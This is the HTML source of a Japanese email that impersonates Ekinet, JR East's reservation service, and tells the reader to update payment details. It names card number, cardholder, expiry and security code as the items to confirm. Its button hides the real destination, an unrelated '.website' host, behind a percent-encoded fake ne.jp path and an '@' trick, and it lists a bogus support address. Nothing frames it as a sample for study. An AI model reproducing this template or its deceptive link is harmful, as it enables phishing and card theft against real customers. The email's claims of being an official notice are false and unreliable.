決済情報の更新をお願いします
<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang=ja><head><title>決済情報更新通知 - えきねっと</title>
<meta charset=UTF-8>
<meta name=viewport content="width=device-width, initial-scale=1.0">
<style>
/* Reset and base styles */
* {
margin: 0;
padding: 0;
box-sizing: border-box;
}
body {
font-family: -apple-system, BlinkMacSystemFont, "Hiragino Sans", "Hiragino Kaku Gothic ProN", "游ゴシック", sans-serif;
line-height: 1.6;
color: #333;
background-color: #fff;
-webkit-text-size-adjust: 100%;
}
/* Email container */
.email-container {
max-width: 600px;
margin: 0 auto;
padding: 25px 20px;
}
/* Header */
.header {
text-align: center;
margin-bottom: 25px;
padding-bottom: 20px;
border-bottom: 1px solid #e0e0e0;
}
.store-name {
font-size: 26px;
font-weight: bold;
color: #e60000;
margin-bottom: 8px;
letter-spacing: 0.05em;
}
.header-subtitle {
font-size: 13px;
color: #666;
margin-top: 3px;
}
/* Content sections */
.content-section {
margin-bottom: 25px;
}
.section-title {
font-size: 18px;
font-weight: bold;
color: #333;
margin-bottom: 12px;
padding-bottom: 6px;
border-bottom: 1px solid #e0e0e0;
}
.section-content {
font-size: 15px;
color: #444;
margin-bottom: 15px;
line-height: 1.7;
}
/* Event highlights */
.event-highlight {
background-color: #f9f9f9;
border-left: 3px solid #e60000;
padding: 12px;
margin: 10px 0;
border-radius: 0 3px 3px 0;
}
.event-title {
font-weight: bold;
color: #333;
margin-bottom: 4px;
font-size: 15px;
}
.event-date {
color: #666;
font-size: 13px;
margin-bottom: 8px;
}
/* CTA Button */
.cta-button {
display: inline-block;
background-color: #e60000;
color: #fff;
text-decoration: none;
padding: 10px 20px;
border-radius: 3px;
font-weight: bold;
font-size: 14px;
margin: 10px 0;
transition: background-color 0.3s;
}
.cta-button:hover {
background-color: #cc0000;
}
/* Divider */
.divider {
border-top: 1px solid #e0e0e0;
margin: 20px 0;
}
/* Store info */
.store-info {
background-color: #f5f5f5;
padding: 15px;
border-radius: 3px;
margin: 15px 0;
}
.store-info-title {
font-weight: bold;
margin-bottom: 8px;
color: #333;
}
/* Contact section */
.contact-section {
font-size: 14px;
color: #555;
margin: 20px 0;
}
.contact-link {
color: #333;
text-decoration: underline;
}
/* Footer */
.footer {
font-size: 13px;
color: #666;
margin-top: 25px;
padding-top: 20px;
border-top: 1px solid #e0e0e0;
}
.social-links {
margin: 15px 0;
}
.social-link {
color: #666;
text-decoration: none;
margin-right: 15px;
font-size: 13px;
}
.social-link:hover {
color: #333;
}
/* Responsive styles */
@media screen and (max-width: 600px) {
.email-container {
padding: 15px 15px;
}
.store-name {
font-size: 22px;
}
.section-title {
font-size: 17px;
}
.section-content {
font-size: 14px;
}
.cta-button {
display: block;
text-align: center;
width: 100%;
padding: 12px;
}
.store-info {
padding: 12px;
}
}
/* Utility classes */
.text-center {
text-align: center;
}
.mb-8 {
margin-bottom: 8px;
}
.mb-10 {
margin-bottom: 10px;
}
.mb-15 {
margin-bottom: 15px;
}
.mb-20 {
margin-bottom: 20px;
}
.mt-8 {
margin-top: 8px;
}
.mt-15 {
margin-top: 15px;
}
..mt-20 {
margin-top: 20px;
}
.highlight-box {
background-color: #fff0f0;
border: 2px solid #ffcccc;
padding: 15px;
border-radius: 5px;
margin: 15px 0;
}
.highlight-title {
font-weight: bold;
color: #cc0000;
font-size: 16px;
margin-bottom: 10px;
}
.info-list {
margin-left: 20px;
margin-bottom: 15px;
}
.info-list li {
margin-bottom: 5px;
}
</style>
</head>
<body>
<div class=email-container><!-- Header -->
<div class=header>
<h1 class=store-name>えきねっと</h1>
<div class=header-subtitle>JR東日本公式予約サービス</div></div><!-- Main content -->
<div class=content-section>
<h2 class=section-title>決済情報更新通知</h2>
<div class=section-content>
<p class=mb-10>えきねっとをご利用いただきありがとうございます。</p>
<p
class=mb-10>お客様の決済情報について、以下の理由により更新が必要です。お手数ですが、下記の対応方法をご確認ください。</p></div></div>
<div class=highlight-box>
<div class=highlight-title>【重要】決済情報の更新が必要です</div>
<ul class=info-list>
<li>ご確認いただく情報:
<li>クレジットカード情報(有効期限など)
<li>カード名義人の確認
<li>カード番号の確認
<li>セキュリティコードの確認</li></ul></div>
<div class=content-section>
<h2 class=section-title>◆決済情報更新のご案内◆</h2>
<div class=section-content>
<p class=mb-10><strong>更新理由:</strong>決済情報の確認・更新</p>
<p class=mb-10><strong>1.</strong> 下記ボタンからえきねっと公式サイトへ</p>
<p class=mb-10><strong>2.</strong> ログイン後、マイページから決済情報を選択</p>
<p class=mb-15><strong>3.</strong> 決済情報を確認・更新</p></div></div>
<div class=content-section>
<div class=event-highlight>
<div class=event-title>決済情報を確認・更新する</div>
<div class="event-date mb-8">スムーズなご利用のために今すぐご確認ください</div><a class=cta-button
href="http:/zgocgeb.ne.jp%2Fqnlaesqks%2Ffkyicjxl%2Foyfjs%2FkPJNxvtex%2Fcpyke@goldencarvenhotel.website">決済情報確認ページへ</a> </div></div>
<div class=content-section>
<div class=section-content>
<p class=mb-10> </p></div></div>
<div class=content-section>
<h2 class=section-title>【お問い合わせ先】</h2>
<div class=section-content>
<p class=mb-10><strong>えきねっと カスタマーサポート</strong></p>
<p class=mb-8><strong>電話:</strong>0120-25-2516(受付時間
10:00-19:00)</p>
<p class=mb-15><strong>メール:</strong>support@ptvqnoe.com</p>
<p class=mb-10>決済情報の更新に関するご質問は、上記のカスタマーサポートまでお問い合わせください。</p></div></div>
<div class=footer>
<p class="text-center mb-15"><strong>メール配信設定について</strong></p>
<div class=section-content>
<p class=mb-15>メール配信の設定を変更されたい方は、アカウント設定ページよりお手続きください。</p></div>
<div class=mt-20>
<p class=text-center>えきねっと(JR東日本)<br>〒100-0005 東京都千代田区丸の内1-6-5<br>Copyright
えきねっと All rights reserved..</p></div></div></div></body></html>